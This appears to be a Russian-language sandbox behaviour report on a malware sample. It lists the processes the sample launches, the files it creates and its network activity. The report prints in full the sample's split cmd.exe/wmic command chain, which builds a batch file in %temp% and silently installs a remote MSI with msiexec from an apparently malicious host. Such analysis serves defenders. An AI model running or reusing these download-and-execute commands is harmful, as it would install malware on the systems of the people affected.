Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\AQfIl.bat&echo|set /p="iexec /i http://ftpthedocgrp.com/backup.msi /q'" >> %temp%\AQfIl.bat&%temp%\AQfIl.bat>%temp%\AQfIl.txt
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1376
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\aqfil.bat
- %TEMP%\aqfil.txt
- %TEMP%\979826.cvr
Сетевая активность
Подключается к
- 'ft####docgrp.com':80
TCP
Запросы HTTP GET
- http://ft####docgrp.com/backup.msi
UDP
- DNS ASK ft####docgrp.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'ms" 1>%TEMP%\AQfIl.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="iexec /i http://ftpthedocgrp.com/backup.msi /q'" 1>>%TEMP%\AQfIl.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i http://ftpthedocgrp.com/backup.msi /q'
- '<SYSTEM32>\msiexec.exe' /i http://ftpthedocgrp.com/backup.msi /q
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\AQfIl.bat&echo|set /p="iexec /i http://ftpthedocgrp.com/backup.msi /q'" >> %temp%\AQfIl.bat&%temp%\AQfIl.bat>%temp%\AQfIl.txt (со скрытым окном)
